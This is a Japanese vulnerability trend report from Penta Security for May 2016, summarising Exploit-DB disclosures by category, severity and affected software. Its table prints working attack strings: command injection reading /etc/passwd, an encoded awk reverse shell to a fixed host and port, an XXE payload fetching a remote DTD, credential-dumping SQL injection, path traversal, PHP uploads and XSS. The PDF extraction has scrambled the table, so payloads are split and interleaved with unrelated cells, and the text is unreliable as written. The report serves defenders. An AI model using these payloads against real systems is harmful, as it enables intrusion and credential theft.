2016.05 EDB-Report 最新Web脆弱性トレンドレポート(2016.05) 2016.05.01~2016.05.31 Exploit-DB(http://exploit-db.com)より公開されている内容に基づいた脆弱性トレンド情報です。 ペンタセキュリティシステムズ株式会社R&Dセンター データセキュリティチーム サマリー 2016年5月に公開されたExploit-DBの分析結果、クロスサイトスクリプティング(Cross Site Scripting)の攻撃に対する脆弱性報告数が最も多かったです。クロスサイトスクリプティング(Cross Site Scripting) 攻撃は、一般的にパラメーター値を利用して攻撃する方法です。しかし、5月発見された攻撃は、キーの値もしくは特定HTTP HeaderのValueを狙う攻撃が主に発見されました。このような攻撃は特定のプログラム の上でのみ発生される脆弱性です。当該プログラムを使用する管理者は、脆弱性にさらされたページを確認して、ソースコード上のセキュアコーディングが至急です。また、5月は、コマンド インジェクション(Command Injection)と関連した多彩な攻撃パターンも発見されました。コマンド インジェクション(Command Injection)攻撃は、脆弱な命令語または関数をパラメーターとしても利用し、該当動作をすぐ実行させることがで きます。したがって、特別な場合を除いては、関連命令語や関数を使用しないことをお勧めします。もし、該当命令語と関数を必ず使用しなければならない場合なら、入力値を検証するフィルターにパイプ(|)、セミコ ロン(;)などのマルチラインを支援する特殊文字に対する検証を行い、該当関数に有害な値が渡されないようにしなければなりません。関連の脆弱性が発見されたソフトウェアを使用する管理者は脆弱性が発見され たページやパラメーターを確認して、多様なコマンド インジェクション(Command Injection)攻撃に対して備える必要があります。 1. 脆弱性別件数 脆弱性カテゴリ 脆弱性別件数 件数 インフォメーションディスクロージャー (Information Disclosure) ローカルファイル挿入 (Local File Inclusion:LFI) 35 29 1 30 25 2 20 ディレクトリトラバーサル (Directory Traversal) 2 ファイルアップロード (File Upload) 3 コマンド インジェクション (Command Injection) 5 SQL インジェクション (SQL Injection) 7 15 クロスサイトスクリプティング (Cross Site Scripting : XSS) 合計 2 1 2 7 5 3 9 10 5 0 9 29 危険度別分類 2. 危険度別件数 件数 危険度 割合 早急対応要 2 7% 高 22 76% 中 5 17% 合計 29 100% 2 5 早急対応要 高 中 22 3. 攻撃実行の難易度別件数 難易度 件数 割合 難 1 3% 中 6 21% 易 22 76% 合計 29 100% 攻撃実行の難易度別件数 1 6 難 中 易 22 4. 主なソフトウェア別脆弱性発生件数 ソフトウェア名 IPFire XenAPI AirOS Real Estate Portal Web2py ProcessMaker AfterLogic WebMail Acunetix WP Security EduSec DNSmasq ZeewaysCMS - Multiple Vulnerabilities Open Source Real Estate Script ZeewaysCMS ManageEngine Password Manager PHP Realestate Script Script PHP Imagick Magento eXtplorer FlatPress CakePHP SAP xMII 件数 4 2 2 2 2 2 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 合計 29 主なソフトウェア別脆弱性発生件数 IPFire XenAPI AirOS 1 1 1 4 Real Estate Portal 1 1 Web2py 2 1 ProcessMaker 1 2 1 AfterLogic WebMail 1 2 1 1 2 1 1 1 1 Copyright 2016 Penta Security Systems Inc. All rights reserved 2 Acunetix WP Security EduSec DNSmasq ZeewaysCMS - Multiple Vulnerabilities Open Source Real Estate Script EDB-Report 最新Web脆弱性トレンドレポート(2016.05) 2016.05.01~2016.05.31 Exploit-DB(http://exploit-db.com)より公開されている内容に基づいた脆弱性トレンド情報です。 危険度分類基準 早急対応要:攻撃が成功した場合システムへ侵入可 高:システム情報を取得するか、あるいはクライアントに2次被害を及ぼす 中:情報漏洩 攻撃実行難易度分類基準 難:複数の脆弱性を突いた攻撃パターン、対象のシステムの重要な情報を取得 するため、高度な攻撃コードを採用したパターン、知らされていない攻撃 コードを採用したパターンのいずれかに該当する 中:攻撃手法自体は難しくないが、迂回コードを採用したパターン 易:1回のリクエストで攻撃が成立するパターン、複数回トライするも、 既知の攻撃コードを採用したパターンのいずれかに該当する ** 5件以上発生した主なソフトウェア別脆弱性の詳細情報 EDB 番号 脆弱性カテゴリ 攻撃難易度 危険度 Copyright 2016 Penta Security Systems Inc. All rights reserved 脆弱性名 ソフトウェア名 EDB-Report 最新Web脆弱性トレンドレポート(2016.05) 2016.05.01~2016.05.31 Exploit-DB(http://exploit-db.com)より公開されている内容に基づいた脆弱性トレンド情報です。 日付 EDB番号 脆弱性カテゴリ 攻撃難脆弱性度 危険度 脆弱性名 2016-05-04 39766 Command Injection 易 高 PHP Imagick 3.3.0 - / command /image.jpg"|cat /etc/passwd>a.txt" injection 脆弱性 2016-05-04 39765 XSS 易 中 /cgi-bin/ipinfo.cgi?<script>alert(/RXSS-Yann_CAM_IPFire < 2.19 Core Update 101 _Security_Consultant_@ASafety_-_SYNETIS/)</script> ipinfo.cgi XSS 脆弱性 2016-05-04 39761 XSS 易 高 Acunetix WP Security Plugin 3.0.3 - XSS 脆弱性 攻撃コード /wordpress/?s="><script>alert("Johto.Robbie"</script> 対象プログラム 対象環境 PHP Imagick PHP Imagick 3.3.0 IPFire IPFire < 2.19 Core Update 10 Acunetix WP Security Acunetix WP Security Plugin 3.0. /cgibin/ipinfo.cgi?<script>eval(unescape("%76%61%72%20%68 %65%61%64%3D%64%6F%63%75%6D%65%6E%74%2E%6 2016-05-04 39765 XSS 中 高 IPFire < 2.19 Core Update 101 ipinfo.cgi XSS 脆弱性 (2) 7%65%74%45%6C%65%6D%65%6E%74%73%42%79%54% 61%67%4E%61%6D%65%28%27%68%65%61%64%27%29 IPFire %5B%30%5D%3B%76%61%72%20%73%63%72%69%70%7 IPFire < 2.19 Core Update 10 4%3D%20%64%6F%63%75%6D%65%6E%74%2E%63%72% 65%61%74%65%45%6C%65%6D%65%6E%74%28%27%73 %63%72%69%70%74%27%29%3B%73%63%72%69%70%7 POST / HTTP/1.1 Host: User-Agent: Mozilla/5.0 Windows NT 6.1; WOW64 IPFire < 2.19 Core Update 101 - AppleWebKit/535.7 KHTML, like Gecko Chrome/16.0.912.75 2016-05-04 39765 Command Injection 中 高 ipinfo.cgi Command Injection 脆 Safari/535.7 弱性 (3) IPFire Accept: */* IPFire < 2.19 Core Update 10 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 POST / HTTP/1.1 Host: User-Agent: Mozilla/5.0 Windows NT 6.1; WOW64 AppleWebKit/535.7 KHTML, like Gecko Chrome/16.0.912.75 Safari/535.7 IPFire < 2.19 Core Update 101 - Accept: */* 2016-05-04 39765 Command Injection 易 中 ipinfo.cgi Command Injection 脆 Content-Type: application/x-www-form-urlencoded; 弱性 (4) IPFire charset=UTF-8 IPFire < 2.19 Core Update 10 NCSA_PASS=||eval `echo -e "YXdrICdCRUdJTiB7cyA9ICIvaW5ldC90Y3AvMC8xOTIuMTY4 LjAuMi8xMzM3Ijsg\\\\\\\\nd2hpbGUoNDIpIHsgZG97 IHByaW50ZiAic2hlbGw+IiB8JiBzOyBzIHwmIGdldGxp\\\\ ManageEngine Applications 2016-05-06 39780 SQL Injection 中 早急対応要 Manager Build 12700 downTimeScheduler.do SQL Injection 脆弱性 2016-05-09 39784 Directory Traversal 中 高 ZeewaysCMS - createPDF.php Directory Traversal 脆弱性 /downTimeScheduler.do?method=viewMaintenanceTask&t askid=1%20UNION%20ALL%20SELECT%201,2,database(),4,5,6,7,8, 9,10,11,12,13,14,15%20-- /createPDF.php?targeturl=Ly4uLy4uLy4uLy4uLy4uLy4uLy4u Ly4uL2V0Yy9wYXNzd2Q=&&pay_id=4&&type=actual Copyright 2016 Penta Security Systems Inc. All rights reserved ManageEngine Applications Manager ManageEngine Applications Manager Build 1270 ZeewaysCMS Multiple Vulnerabilities ZeewaysCMS EDB-Report 最新Web脆弱性トレンドレポート(2016.05) 2016.05.01~2016.05.31 Exploit-DB(http://exploit-db.com)より公開されている内容に基づいた脆弱性トレンド情報です。 日付 EDB番号 脆弱性カテゴリ 攻撃難脆弱性度 危険度 脆弱性名 攻撃コード 対象プログラム 対象環境 ZeewaysCMS ZeewaysCMS Web2py Web2py 2.14.5 POST / HTTP/1.1 Host: User-Agent: Mozilla/5.0 Windows NT 6.1; WOW64 AppleWebKit/535.7 KHTML, like Gecko Chrome/16.0.912.75 2016-05-09 39784 XSS 易 高 ZeewaysCMS - createPDF.php XSS 脆弱性 (2) Safari/535.7 Accept: */* Content-Type: application/x-www-form-urlencoded; charset=UTF-8 screen_name="><script><<imgIMG SRC=oi onerror=JaVaScript:alert(1)> POST /admin/default/pack_custom/test HTTP/1.1 Host: User-Agent: Mozilla/5.0 Windows NT 6.1; WOW64 AppleWebKit/535.7 KHTML, like Gecko Chrome/16.0.912.75 2016-05-16 39821 LFI 易 高 Web2py 2.14.5 - pack_custom Safari/535.7 LFI 脆弱性(1) Accept: */* Content-Type: application/x-www-form-urlencoded; charset=UTF-8 file=/etc/passwd /dns_dhcp/dns/dns.php?net=1%20and%20(select%201%20 Web interface for DNSmasq / 2016-05-16 39817 SQL Injection 中 早急対応要 from(select%20count(*),concat((select%20(select%20concat( Mikrotik - dns.php SQL Injection 0x2b,host,0x2b,user,0x2b,password,0x2b))%20from%20mys 脆弱性 DNSmasq ql.user%20limit%201),floor(rand(0)*2))x%20from%20mysql.u Web interface for DNSmasq ser%20group%20by%20x)a) POST / HTTP/1.1 Host: 2016-05-16 39816 File Upload 易 高 eXtplorer 2.1.9 - Archive Path Traversal Connection: CloseAccept: text/html, application/xhtml+xml, */* eXtplorer eXtplorer 2.1. Accept-Language: ko-KR User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2; WOW64; Trident/6.0) GET /cake/cake3/ HTTP/1.1 2016-05-16 39813 XSS 易 高 2016-05-16 39821 XSS 易 高 CakePHP Framework 3.2.4 /cake/cake3/ XSS 脆弱性 Web2py 2.14.5 /admin/default/install_plugin/ XSS 脆弱性 2016-05-17 39837 Directory Traversal 易 中 Host: CLIENT-IP: 100.200.300.400 <script>alert('poc');</script> /admin/default/install_plugin/test?plugin=math2py&source =javascript:alert(1) SAP xMII 15.0 - /XMII/ Directory /XMII/Catalog?Mode=GetFileList&Path=Classes/../../../../../../ Traversal 脆弱性 ../../../../../../etc/passwd CakePHP CakePHP Framework 3.2.4 Web2py Web2py 2.14.5 SAP xMII SAP xMII 15.0 Magento Magento < 2.0.6 POST /rest/V1/guest-carts/test/set-payment-information Magento < 2.0.6 2016-05-18 39838 Command Injection 難 高 Unauthenticated Arbitrary Unserialize -> Arbitrary Write File HTTP/1.1 Host: User-Agent: Mozilla/5.0 Windows NT 6.1; WOW64 AppleWebKit/535.7 KHTML, like Gecko Chrome/16.0.912.75 Safari/535.7 /api.php?action=getGroup&value=' UNION ALL SELECT 2016-05-23 39849 SQL Injection 易 高 XenAPI 1.4.1 for XenForo - NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CCONCAT(I Multiple SQL Injections (2) FNULL(CAST(%40%40HOSTNAME AS CHAR)%2C0x20))%2CNULL%23 Copyright 2016 Penta Security Systems Inc. All rights reserved XenAPI XenAPI 1.4.1 for XenForo EDB-Report 最新Web脆弱性トレンドレポート(2016.05) 2016.05.01~2016.05.31 Exploit-DB(http://exploit-db.com)より公開されている内容に基づいた脆弱性トレンド情報です。 日付 EDB番号 脆弱性カテゴリ 攻撃難脆弱性度 危険度 2016-05-23 39849 SQL Injection 易 高 2016-05-24 39850 Information Disclosure 脆弱性名 XenAPI 1.4.1 for XenForo Multiple SQL Injections 攻撃コード /api.php?action=getUsers&value=' UNION ALL SELECT CONCAT(IFNULL(CAST(%40%40HOSTNAME AS 高 XenAPI CHAR)%2C0x20))%2CNULL%23 AfterLogic WebMail Pro ASP.NET /spellcheck.aspx?xml=<?xml version="1.0" encoding="utf易 対象プログラム 6.2.6 - Administrator Account 8"?> <!DOCTYPE root [ <!ENTITY % remote SYSTEM Disclosure via XXE Injection "http://81.17.25.9/test.dtd"> %remote; %int; %trick;]> AfterLogic WebMail 対象環境 XenAPI 1.4.1 for XenForo AfterLogic WebMail Pro ASP.NET 6.2.6 POST /upload.php HTTP/1.1 Host: Connection: CloseAccept: text/html, application/xhtml+xml, */* Accept-Language: ko-KR 2016-05-26 39855 File Upload 易 中 Real Estate Portal 4.1 - File Upload (2) User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2; WOW64; Trident/6.0) Real Estate Portal Content-Type: multipart/form-data; boundary=------------- Real Estate Portal 4.1 --------------7dd10029908f2 -----------------------------7dd10029908f2 Content-Disposition: form-data; name="file"; filename="Test.php" /student/stu2016-05-26 39856 SQL Injection 易 高 EduSec 4.2.5 - SQL Injection master/view?id=2%20UniOn%20SeleCt%201,load_file(%27/ EduSec EduSec 4.2.5 etc/passwd%27),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18-- 2016-05-26 39855 XSS 易 中 2016-05-27 39864 SQL Injection 易 高 Real Estate Portal 4.1 - XSS (1) /index.php?title=onmousemove=alert(1) Real Estate Portal Real Estate Portal 4.1 /single.php?view_id=PHP Realestate Script Script 4.9.0 57+/*!50000union*/+select+1,2,user_name,4,5,6,7,8,passwo - SQL Injection rd,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26+from PHP Realestate PHP Realestate Script Script Script Script 4.9.0 +admin_login /contact_view.php?contact=2016-05-30 39868 SQL Injection 易 高 Open Source Real Estate Script 3.6.0 - SQL Injection 25527%27+/*!50000union*/+select+1,2,3,4,5,6,7,8,9,10,11,1 Open Source Real Open Source Real 0,13,14,15,16,17,18,19,20,username,22,password,24,25,26,2 Estate Script Estate Script 3.6.0 7,28,29,30,31,32,33,34,35,36,37+/*!50000from*/+/*!50000a POST / HTTP/1.1 Host: User-Agent: Mozilla/5.0 Windows NT 6.1; WOW64 AppleWebKit/535.7 KHTML, like Gecko Chrome/16.0.912.75 ProcessMaker 3.0.1.7 2016-05-31 39872 XSS 易 高 /sysworkflow/en/neoclassic/proce ssProxy/saveProcess XSS 脆弱性 Safari/535.7 Accept: */* Content-Type: application/x-www-form-urlencoded; charset=UTF-8 PRO_TITLE=AA<img src=x onerror=alert(1)>A&PRO_DESCRIPTION=BBB&PRO_CATEG ORY= Copyright 2016 Penta Security Systems Inc. All rights reserved ProcessMaker ProcessMaker 3.0.1.7 EDB-Report 最新Web脆弱性トレンドレポート(2016.05) 2016.05.01~2016.05.31 Exploit-DB(http://exploit-db.com)より公開されている内容に基づいた脆弱性トレンド情報です。 日付 2016-05-31 EDB番号 39871 脆弱性カテゴリ LFI 攻撃難脆弱性度 易 危険度 高 脆弱性名 AirOS NanoStation M2 5.6-beta scr.cgi LFI 脆弱性 攻撃コード 対象プログラム 対象環境 AirOS NanoStation M2 AirOS /scr.cgi?fname=../../../../../etc/passwd%00&status= 5.6-bet POST /flatpress/admin.php?p=uploader&action=default HTTP/1.1 Host: Connection: CloseAccept: text/html, application/xhtml+xml, */* Accept-Language: ko-KR User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2; WOW64; Trident/6.0) 2016-05-31 39870 File Upload 易 高 FlatPress 1.0.3 - admin.php File Content-Type: multipart/form-data; boundary=------------Upload 脆弱性 --------------7dd10029908f2 FlatPress FlatPress 1.0.3 -----------------------------7dd10029908f2 Content-Disposition: form-data; name="upload[]"; filename="test.php" Content-Type: application/octet-stream <? phpinfo(); ?> -----------------------------7dd10029908f2-POST /sysworkflow/en/neoclassic/processes/processesList HTTP/1.1 Host: User-Agent: Mozilla/5.0 Windows NT 6.1; WOW64 AppleWebKit/535.7 KHTML, like Gecko Chrome/16.0.912.75 ProcessMaker 3.0.1.7 2016-05-31 39872 XSS 易 高 Safari/535.7 /sysworkflow/en/neoclassic/proce Accept: */* ProcessMaker sses/processesList XSS 脆弱性 # Content-Type: application/x-www-form-urlencoded; ProcessMaker 3.0.1.7 charset=UTF-8 processName=<img src=x onerror=alert(1);>&start=0&limit=25&category=%3Creset %3E= AirOS NanoStation M2 5.6-beta 2016-05-31 39871 Command Injection 中 高 scr.cgi Command Injection 脆弱 性 /scr.cgi?fname=rc.poststart.sh;cat%20/etc/hosts%00&status = Copyright 2016 Penta Security Systems Inc. All rights reserved AirOS AirOS NanoStation M2 5.6-bet
© Copyright 2024 ExpyDoc